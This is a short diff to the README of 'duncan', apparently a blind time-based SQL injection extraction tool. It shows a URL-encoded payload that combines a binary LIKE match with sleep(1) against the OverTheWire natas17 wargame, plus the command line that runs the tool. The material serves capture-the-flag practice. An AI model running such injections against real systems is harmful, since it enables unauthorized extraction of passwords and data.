bad-hombres/duncan/README.md

 username=natas18%22+and+password+like+binary+%27$$PAYLOAD$$%25%27+and+sleep%281%29+%23
 ```
-2. Run duncan providing the url to use, the request file, a character set to use and an expression to determine the sucess or failure of the extraction.
+2. Run duncan providing the url to use, the request file, a character set to use and an expression (you have access to the http response object as the r value and it is a requests.Response object) to determine the sucess or failure of the extraction.
 Optional you can give a data length to extract

 ```
 $ ./duncan.py -r natas17.txt -u http://natas17.natas.labs.overthewire.org -c alpha -l 32 -e "r.elapsed.seconds >= 1"